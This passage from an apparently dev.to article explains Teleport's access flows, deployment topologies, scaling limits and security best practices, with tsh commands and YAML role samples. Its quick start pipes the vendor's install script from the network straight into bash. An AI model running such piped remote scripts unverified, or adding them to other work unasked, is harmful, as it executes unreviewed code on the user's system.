&lt;/ul&gt;

&lt;p&gt;Teleport Connect makes infrastructure access more intuitive while maintaining all the security benefits of certificate-based authentication and comprehensive auditing.&lt;/p&gt;

&lt;p&gt;↑ Back to top&lt;/p&gt;


&lt;h2&gt;
  
  
  How It All Works Together: Complete Flow Examples
&lt;/h2&gt;


&lt;h3&gt;
  
  
  Example 1: SSH Access to Production Server
&lt;/h3&gt;

&lt;p&gt;Let's walk through a complete access flow from login to executing commands:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcgl4wvwsmy4wc16ac6d2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcgl4wvwsmy4wc16ac6d2.png" alt="image" width="800" height="777"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What Happens:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;User authenticates through their SSO provider&lt;/li&gt;
&lt;li&gt;Auth Service issues short-lived certificate with user's roles&lt;/li&gt;
&lt;li&gt;User selects server from web UI&lt;/li&gt;
&lt;li&gt;Proxy routes connection through reverse tunnel to SSH Agent&lt;/li&gt;
&lt;li&gt;SSH Agent validates certificate and checks RBAC&lt;/li&gt;
&lt;li&gt;Commands execute, session recorded, audit events logged&lt;/li&gt;
&lt;li&gt;When the certificate's TTL elapses (8 hours in this example), access expires automatically&lt;/li&gt;
&lt;/ol&gt;
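
&lt;p&gt;From the user's terminal, the same flow looks like this (proxy address, connector name, and node name are hypothetical; the SSO handoff in step 1 happens in a browser):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;# Steps 1-2: authenticate via SSO; the Auth Service returns a short-lived certificate
tsh login --proxy=teleport.example.com --auth=okta

# Inspect the issued certificate: roles, allowed logins, expiry
tsh status

# Steps 3-5: list reachable servers, then connect through the Proxy's reverse tunnel
tsh ls
tsh ssh root@prod-web-01

# Step 7: nothing to clean up -- the certificate simply expires
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;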


&lt;h3&gt;
  
  
  Example 2: Database Access Request Workflow
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7j81zey3y0g4zuy1dkzx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7j81zey3y0g4zuy1dkzx.png" alt="image" width="800" height="697"&gt;&lt;/a&gt;&lt;/p&gt;


&lt;h3&gt;
  
  
  Example 3: Kubernetes Cluster Access
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkfi13fu0onk48fsvnozv.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkfi13fu0onk48fsvnozv.png" alt="image" width="800" height="655"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;↑ Back to top&lt;/p&gt;


&lt;h2&gt;
  
  
  Getting Started with Teleport
&lt;/h2&gt;


&lt;h3&gt;
  
  
  Quick Start: Local Testing
&lt;/h3&gt;

&lt;p&gt;Get Teleport running locally in minutes:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Download and install Teleport&lt;/span&gt;
curl https://goteleport.com/static/install.sh | bash

&lt;span class="c"&gt;# Generate config&lt;/span&gt;
&lt;span class="nb"&gt;sudo &lt;/span&gt;teleport configure &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; /etc/teleport.yaml

&lt;span class="c"&gt;# Start Teleport (Auth + Proxy + Node)&lt;/span&gt;
&lt;span class="nb"&gt;sudo &lt;/span&gt;teleport start

&lt;span class="c"&gt;# In another terminal, create a user&lt;/span&gt;
&lt;span class="nb"&gt;sudo &lt;/span&gt;tctl &lt;span class="nb"&gt;users &lt;/span&gt;add myuser &lt;span class="nt"&gt;--roles&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;editor,access

&lt;span class="c"&gt;# Login with the user&lt;/span&gt;
tsh login &lt;span class="nt"&gt;--proxy&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;localhost:3080 &lt;span class="nt"&gt;--user&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;myuser

&lt;span class="c"&gt;# Connect to the local node&lt;/span&gt;
tsh ssh root@localhost
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;




&lt;h3&gt;
  
  
  Common Deployment Topologies
&lt;/h3&gt;

&lt;p&gt;Teleport can be deployed in multiple architectures depending on scale, availability needs, and geographic distribution.&lt;/p&gt;

&lt;p&gt;Below are the most common deployment patterns.&lt;/p&gt;


&lt;h4&gt;
  
  
  1. Single-Node Deployment (Development / Small Teams)
&lt;/h4&gt;

&lt;p&gt;The simplest deployment runs Auth, Proxy, and Node services together on one machine.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcy3qcboejii636ycwl4u.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcy3qcboejii636ycwl4u.png" alt="image" width="800" height="549"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Best for:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Local testing&lt;/li&gt;
&lt;li&gt;Small internal environments&lt;/li&gt;
&lt;li&gt;Proof-of-concepts&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Tradeoff:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Not highly available&lt;/li&gt;
&lt;li&gt;Control plane is a single point of failure&lt;/li&gt;
&lt;/ul&gt;
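
&lt;p&gt;A minimal &lt;code&gt;/etc/teleport.yaml&lt;/code&gt; sketch for this topology enables all three services in one process (names and addresses are placeholders):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;teleport:
  nodename: teleport-all-in-one
  data_dir: /var/lib/teleport
auth_service:
  enabled: true
  cluster_name: example-cluster
proxy_service:
  enabled: true
  web_listen_addr: 0.0.0.0:3080
ssh_service:
  enabled: true       # this machine is also an accessible node
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;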


&lt;h4&gt;
  
  
  2. High Availability Deployment (Production)
&lt;/h4&gt;

&lt;p&gt;In production, Teleport is typically deployed with multiple Proxies and Auth nodes backed by a shared database.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9a7dpm8cq0hafudosjv3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9a7dpm8cq0hafudosjv3.png" alt="image" width="800" height="1314"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Best for:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Enterprise production deployments&lt;/li&gt;
&lt;li&gt;Thousands of users/sessions&lt;/li&gt;
&lt;li&gt;Resilience against failures&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Key Properties:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Proxies scale horizontally&lt;/li&gt;
&lt;li&gt;Auth services share backend state&lt;/li&gt;
&lt;li&gt;Agents connect outbound via reverse tunnels&lt;/li&gt;
&lt;/ul&gt;
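
&lt;p&gt;As a sketch of the AWS variant, each Auth instance points at the same DynamoDB backend and S3 session store (table, bucket, region, and public address are placeholders):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;teleport:
  storage:
    type: dynamodb
    region: us-west-2
    table_name: teleport-backend
    audit_events_uri: ['dynamodb://teleport-audit-events']
    audit_sessions_uri: s3://teleport-session-recordings
auth_service:
  enabled: true
proxy_service:
  enabled: true
  public_addr: teleport.example.com:443   # shared address behind the load balancer
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;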


&lt;h4&gt;
  
  
  3. Multi-Region / Global Deployment (Trusted Clusters)
&lt;/h4&gt;

&lt;p&gt;Large organizations often run separate clusters per region, connected through Trusted Clusters.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fiba5h6sc35bfrzougcqq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fiba5h6sc35bfrzougcqq.png" alt="image" width="800" height="671"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Best for:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Multi-region infrastructure&lt;/li&gt;
&lt;li&gt;Mergers/acquisitions&lt;/li&gt;
&lt;li&gt;Customer-isolated environments (MSPs)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Benefits:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Centralized identity with regional isolation&lt;/li&gt;
&lt;li&gt;Independent RBAC boundaries per cluster&lt;/li&gt;
&lt;li&gt;Reduced latency by keeping access local&lt;/li&gt;
&lt;/ul&gt;


&lt;h4&gt;
  
  
  Choosing the Right Topology
&lt;/h4&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Situation&lt;/th&gt;
&lt;th&gt;Recommended Topology&lt;/th&gt;
&lt;th&gt;Reason&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Dev/test, single team&lt;/td&gt;
&lt;td&gt;Single-node&lt;/td&gt;
&lt;td&gt;No ops overhead; failure has low blast radius&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Production, single region&lt;/td&gt;
&lt;td&gt;HA (multi-Proxy, multi-Auth, shared backend)&lt;/td&gt;
&lt;td&gt;Auth or Proxy failure must not gate all access&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Multi-region, latency-sensitive&lt;/td&gt;
&lt;td&gt;HA + Trusted Clusters&lt;/td&gt;
&lt;td&gt;Keep session traffic local; centralize identity&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MSP or multi-tenant&lt;/td&gt;
&lt;td&gt;Trusted Clusters per tenant&lt;/td&gt;
&lt;td&gt;Hard isolation boundary; independent RBAC per cluster&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Acquisition integration&lt;/td&gt;
&lt;td&gt;Trusted Clusters&lt;/td&gt;
&lt;td&gt;Federate identity without merging infrastructure&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;The core rule:&lt;/strong&gt; a single-node Teleport is acceptable only where downtime is acceptable. For any environment where access outages have consequences — on-call response, incident handling, production deployments — HA is not optional.&lt;/p&gt;

&lt;p&gt;Teleport’s architecture is flexible enough to evolve as your infrastructure grows. Start with single-node, promote to HA, extend to federation — each step is a configuration change, not a rebuild.&lt;/p&gt;


&lt;h3&gt;
  
  
  Production Deployment Checklist
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Design Your Architecture&lt;/strong&gt;

&lt;ul&gt;
&lt;li&gt;Decide between Teleport Cloud and self-hosting&lt;/li&gt;
&lt;li&gt;Plan for high availability&lt;/li&gt;
&lt;li&gt;Choose backend storage (DynamoDB + S3, PostgreSQL, etcd, or Firestore)&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Deploy Control Plane&lt;/strong&gt;

&lt;ul&gt;
&lt;li&gt;Deploy Auth Service with HA backend&lt;/li&gt;
&lt;li&gt;Deploy Proxy Service behind load balancer&lt;/li&gt;
&lt;li&gt;Configure TLS certificates&lt;/li&gt;
&lt;li&gt;Set up DNS records&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Integrate Identity Provider&lt;/strong&gt;

&lt;ul&gt;
&lt;li&gt;Configure SSO (Okta, GitHub, Google, SAML)&lt;/li&gt;
&lt;li&gt;Define role mapping from SSO to Teleport roles&lt;/li&gt;
&lt;li&gt;Enable MFA requirements&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Deploy Agents&lt;/strong&gt;

&lt;ul&gt;
&lt;li&gt;Install agents on servers, databases, Kubernetes clusters&lt;/li&gt;
&lt;li&gt;Configure appropriate services per agent&lt;/li&gt;
&lt;li&gt;Set up resource labels for RBAC&lt;/li&gt;
&lt;li&gt;Enable auto-discovery where applicable&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Configure RBAC&lt;/strong&gt;

&lt;ul&gt;
&lt;li&gt;Define roles based on job functions&lt;/li&gt;
&lt;li&gt;Use label-based access control&lt;/li&gt;
&lt;li&gt;Set appropriate certificate TTLs (short-lived: hours, not days)&lt;/li&gt;
&lt;li&gt;Configure access request workflows&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Enable Audit and Compliance&lt;/strong&gt;

&lt;ul&gt;
&lt;li&gt;Configure session recording&lt;/li&gt;
&lt;li&gt;Set up audit log forwarding&lt;/li&gt;
&lt;li&gt;Configure retention policies&lt;/li&gt;
&lt;li&gt;Integrate with SIEM if needed&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Train Users&lt;/strong&gt;

&lt;ul&gt;
&lt;li&gt;Provide documentation for &lt;code&gt;tsh&lt;/code&gt; commands&lt;/li&gt;
&lt;li&gt;Explain certificate-based authentication&lt;/li&gt;
&lt;li&gt;Document access request process&lt;/li&gt;
&lt;li&gt;Share best practices&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
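
&lt;p&gt;As one concrete sketch of step 3, a GitHub SSO connector maps organization teams to Teleport roles (the org, team, secrets, and URL below are placeholders):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;kind: github
version: v3
metadata:
  name: github
spec:
  display: GitHub
  client_id: &lt;oauth-app-client-id&gt;
  client_secret: &lt;oauth-app-client-secret&gt;
  redirect_url: https://teleport.example.com:443/v1/webapi/github/callback
  teams_to_roles:
    - organization: example-org
      team: platform-engineering
      roles: ["access", "editor"]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;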

&lt;p&gt;↑ Back to top&lt;/p&gt;


&lt;h2&gt;
  
  
  Performance and Scaling Considerations
&lt;/h2&gt;


&lt;h3&gt;
  
  
  Connection Flow Overhead
&lt;/h3&gt;

&lt;p&gt;Teleport adds minimal latency to connections:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Initial Authentication&lt;/strong&gt;: One-time certificate issuance (1-2 seconds)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Connection Establishment&lt;/strong&gt;: Certificate validation (milliseconds)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Data Transfer&lt;/strong&gt;: After connection establishment, Teleport introduces &lt;strong&gt;minimal but non-zero overhead&lt;/strong&gt; — primarily from TLS termination at the Proxy, connection multiplexing through the reverse tunnel, and optional session recording. In practice this is imperceptible for interactive sessions, but measurable for high-throughput database or bulk-transfer workloads.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The certificate model means Teleport doesn't need to be consulted for every packet, only for initial connection establishment.&lt;/p&gt;


&lt;h3&gt;
  
  
  Scaling Characteristics
&lt;/h3&gt;

&lt;p&gt;Large-scale Teleport deployments can support:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Concurrent Sessions&lt;/strong&gt;: Thousands of concurrent sessions — practical limits are driven by Proxy CPU/memory, backend IOPS, and whether session recording is enabled. Proxy-mode recording is significantly heavier than node-mode recording at scale.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Agents&lt;/strong&gt;: Each agent establishes persistent reverse tunnel connections (typically one or a small pool, scaling dynamically under load). Tens of thousands of registered nodes are achievable with a well-sized backend.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Users&lt;/strong&gt;: Large user bases supported (limits depend on backend performance and Auth Service sizing)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Resources&lt;/strong&gt;: Tens of thousands of resources in inventory&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Reality Check on Scale:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Teleport scales well, but &lt;strong&gt;scaling is not automatic — it is constrained by clear bottlenecks&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Backend IOPS and storage performance&lt;/li&gt;
&lt;li&gt;Proxy CPU and memory resources&lt;/li&gt;
&lt;li&gt;Audit event throughput and processing&lt;/li&gt;
&lt;li&gt;Network bandwidth for session traffic&lt;/li&gt;
&lt;/ul&gt;


&lt;h3&gt;
  
  
  High-Performance Deployments
&lt;/h3&gt;

&lt;p&gt;For large-scale deployments:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Deploy multiple Proxy Service instances&lt;/li&gt;
&lt;li&gt;Use multiple Auth Service instances with shared backend&lt;/li&gt;
&lt;li&gt;Distribute agents across regions&lt;/li&gt;
&lt;li&gt;Use high-performance backend (DynamoDB with provisioned capacity, tuned PostgreSQL)&lt;/li&gt;
&lt;li&gt;Enable local caching on agents&lt;/li&gt;
&lt;li&gt;Scale DB Agents horizontally for high connection volumes&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Real-world bottleneck pattern — Database Access:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;At scale, database access tends to become the first performance bottleneck teams hit. DB agents must multiplex many client connections, each of which requires TLS termination and proxying. Unlike SSH sessions (which are long-lived and low-overhead once established), database workloads often involve frequent short-lived connections that amplify this cost. Connection pooling behavior at the agent level matters significantly — teams typically need to scale DB agents horizontally earlier than they expect, and often before any other component shows strain.&lt;/p&gt;

&lt;p&gt;↑ Back to top&lt;/p&gt;


&lt;h2&gt;
  
  
  Best Practices
&lt;/h2&gt;


&lt;h3&gt;
  
  
  1. Certificate TTL Configuration
&lt;/h3&gt;

&lt;p&gt;Keep TTLs as short as practical. Short TTLs are the primary lever for limiting blast radius on compromised credentials — an attacker with a stolen certificate can only use it until it expires.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Short TTLs for production access&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;role&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;production-access&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;options&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;max_session_ttl&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;4h&lt;/span&gt;  &lt;span class="c1"&gt;# 4h is a good default; adjust down if re-auth friction is acceptable&lt;/span&gt;

&lt;span class="c1"&gt;# Longer TTLs for development&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;role&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;dev-access&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;options&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;max_session_ttl&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;24h&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Rule of thumb:&lt;/strong&gt; Production ≤ 8h (4h recommended). Bots/automation ≤ 1h. Dev ≤ 24h. Never set TTL longer than your incident response SLA.&lt;/p&gt;
&lt;/blockquote&gt;


&lt;h3&gt;
  
  
  2. Use Access Requests for Elevated Privileges
&lt;/h3&gt;

&lt;p&gt;Never grant permanent production access to human users. Use time-bounded requests instead — the approval friction is a feature, not a bug. Require a reason; it creates accountability and a paper trail that's useful in audits and post-incident reviews.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;role&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;developer&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;allow&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;request&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;roles&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;production-access'&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
      &lt;span class="na"&gt;thresholds&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;approve&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;1&lt;/span&gt;
          &lt;span class="na"&gt;deny&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;1&lt;/span&gt;
      &lt;span class="c1"&gt;# Require a reason — surfaces intent and aids audit trails&lt;/span&gt;
      &lt;span class="na"&gt;annotations&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;reason&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Required&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;for&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;all&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;production&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;access&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;requests"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;




&lt;h3&gt;
  
  
  3. Implement a Governed Resource Labels Strategy
&lt;/h3&gt;

&lt;p&gt;Treat labels as a typed contract, not freeform metadata. Define your schema upfront and enforce it via IaC (Terraform, Pulumi). Ad-hoc labeling leads to RBAC drift — resources silently entering or leaving access scope without review.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Consistent labeling scheme — define this schema org-wide and enforce it&lt;/span&gt;
&lt;span class="na"&gt;ssh_service&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;labels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;env&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;production&lt;/span&gt;        &lt;span class="c1"&gt;# Required: dev | staging | production&lt;/span&gt;
    &lt;span class="na"&gt;team&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;backend&lt;/span&gt;          &lt;span class="c1"&gt;# Required: maps to owning team&lt;/span&gt;
    &lt;span class="na"&gt;region&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;us-west-2&lt;/span&gt;      &lt;span class="c1"&gt;# Required: for geo-scoped roles&lt;/span&gt;
    &lt;span class="na"&gt;compliance&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;pci-dss&lt;/span&gt;    &lt;span class="c1"&gt;# Optional: compliance scope tags&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Rule of thumb:&lt;/strong&gt; If a label isn't defined in your schema, it shouldn't be on a resource. Audit for unlabeled or non-conforming resources regularly.&lt;/p&gt;
&lt;/blockquote&gt;


&lt;h3&gt;
  
  
  4. Enable Session Recording for All Production Access
&lt;/h3&gt;

&lt;p&gt;Always record production sessions. Storage cost is negligible compared to the forensic and compliance value. Use &lt;code&gt;node&lt;/code&gt; mode for large fleets (distributes load); use &lt;code&gt;proxy&lt;/code&gt; mode when tamper-resistance from the agent side is a compliance requirement.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;role&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;production-access&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;options&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;record_session&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;desktop&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
      &lt;span class="na"&gt;default&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;node&lt;/span&gt;   &lt;span class="c1"&gt;# Use 'proxy' if you need centralized, tamper-resistant recording&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Development roles can use &lt;code&gt;default: off&lt;/code&gt; to reduce storage costs, but staging environments should mirror production recording policy.&lt;/p&gt;


&lt;h3&gt;
  
  
  5. Integrate with Your Security Stack
&lt;/h3&gt;

